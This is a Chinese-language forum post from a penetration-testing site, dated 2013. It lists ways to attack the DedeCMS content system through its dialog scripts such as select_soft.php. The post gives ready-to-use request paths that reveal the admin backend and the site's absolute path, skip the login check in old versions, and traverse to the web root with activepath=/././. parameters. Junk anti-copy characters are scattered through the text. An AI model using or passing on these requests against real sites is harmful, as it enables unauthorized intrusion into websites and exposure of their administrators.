中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]

作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理1 [  R# B4 e: A' d9 Y
! z- l+ E: O1 n6 ^4 h/ w: T
员帐号,新版本的就直接转向了后台.
* p- g5 S7 y( A" O( m
6 g$ d% g( J( U) z# ]) [2.include/dialog/config.php会爆出后台管理路径* l: A6 D* L, u' ]
4 V6 _' [1 Q- M& a% l
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
' G$ L5 ~, D8 q  w' n
: N; y1 S6 N: ^, E, _$ R4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
5 _" A/ O" Z! o" U$ o9 }0 M" f+ g9 @' B% j; U) `- i5 u
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉  J: V, ~6 j8 N9 ]6 M! K

% f; i' K9 o3 O- h# s2 U到根目录去.不过这些版本的访问地址有些不同.
, z3 Y2 R7 }" a! I! t  a" n地址为require/dialog/select_soft.php?activepath=/././././././././
( z+ Y) |! t: A- L' m
3 \1 z! l5 R/ Winclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..6 i4 f( R" d, ~% x* v
存在相同问题的文件还有
; u6 z' W% ~- P+ r  T1 Dinclude\dialog\select_images.php  T' |- k9 ?. {* _
include\dialog\select_media.php
. I7 u$ p5 N* R( xinclude\dialog\select_templets.php​! L3 K) ~( I. s6 j3 \





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2